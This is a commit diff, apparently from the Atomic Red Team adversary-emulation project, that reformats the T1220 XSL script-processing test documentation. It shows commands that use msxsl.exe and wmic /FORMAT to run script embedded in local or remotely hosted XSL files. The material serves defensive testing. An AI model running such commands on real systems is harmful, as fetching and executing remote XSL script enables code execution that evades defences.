Add Dependencies section to test Yaml and support to use them in the PS execution framework (#772)
* first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * first draft at dependencies * lowercase url
This commit is contained in:
Carrie Roberts
committed by
Michael Haag
Michael Haag
parent
550ba03c22
commit
511bb87af2
+24
-8
@@ -36,19 +36,23 @@ Executes the code specified within a XSL script tag during XSL transformation us
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| xmlfile | Location of the test XML file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslxmlfile.xml|
|
||||
| xslfile | Location of the test XSL script file on the local filesystem. | Path | PathToAtomicsFolder\T1220\src\msxslscript.xsl|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
```
|
||||
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
@@ -58,19 +62,23 @@ Executes the code specified within a XSL script tag during XSL transformation us
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
|
||||
| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
```
|
||||
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
@@ -80,19 +88,23 @@ Executes the code specified within a XSL script using a local payload.
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| wmic_command | WMI command to execute using wmic.exe | string | process list|
|
||||
| local_xsl_file | Location of the test XSL script file on the local filesystem. | path | PathToAtomicsFolder\T1220\src\wmicscript.xsl|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
```
|
||||
wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
@@ -102,17 +114,21 @@ Executes the code specified within a XSL script using a remote payload.
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| wmic_command | WMI command to execute using wmic.exe | string | process list|
|
||||
| remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
|
||||
|
||||
#### Run it with `command_prompt`!
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
```
|
||||
wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
Reference in New Issue
Block a user